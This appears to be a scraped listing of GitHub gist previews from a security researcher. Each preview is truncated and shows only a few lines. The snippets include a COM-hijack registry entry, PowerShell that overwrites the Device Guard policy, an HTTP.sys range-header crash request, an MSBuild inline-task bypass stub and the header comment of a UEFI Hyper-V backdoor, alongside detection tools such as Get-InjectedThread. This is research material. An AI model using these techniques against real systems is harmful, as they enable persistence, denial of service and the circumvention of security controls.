Stop! This text is only interesting for you if you...
- Like popping alerts in weird situations
- Miss CSS expressions as much as we do
- Have an unhealthy obsession for markup porn
curl -s https://api.github.com/orgs/twitter/repos?per_page=200 | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read).each { |repo| %x[git clone #{repo["ssh_url"]} ]}' |
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |
$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible") | |
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID } | |
$d = $s2.DeviceObject + "\" | |
cmd /c mklink /d C:\scpy "$d" | |
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs | |
$s2.Delete() | |
Remove-Item -Path C:\scpy -Force | |
Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml | |
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin | |
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force |
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()} |
/* http://redd.it/2zna5q | |
* Fibonacci example: | |
* (1) (2) + | |
* 0:0 | |
* 1:1 | |
* 20 | |
*/ | |
#define _BSD_SOURCE // MAP_ANONYMOUS | |
#include <stdio.h> | |
#include <stdlib.h> |
/* | |
********************************************************************* | |
Part of UEFI DXE driver code that injects Hyper-V VM exit handler | |
backdoor into the Device Guard enabled Windows 10 Enterprise. | |
Execution starts from new_ExitBootServices() -- a hook handler | |
for EFI_BOOT_SERVICES.ExitBootServices() which being called by | |
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi | |
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys) |
# Author: Matthew Graeber (@mattifestation) | |
# Load dnlib with Add-Type first | |
# dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
filter Get-AssemblyLoadReference { | |
param ( | |
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('FullName')] | |
[String] | |
[ValidateNotNullOrEmpty()] |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml --> | |
<!-- Author: Casey Smith, Twitter: @subTee --> | |
<!-- License: BSD 3-Clause --> | |
<PropertyGroup> | |
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName> | |
<Cmd Condition="'$(Cmd)' == ''">None</Cmd> | |
</PropertyGroup> | |
<Target Name="Hello"> |
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |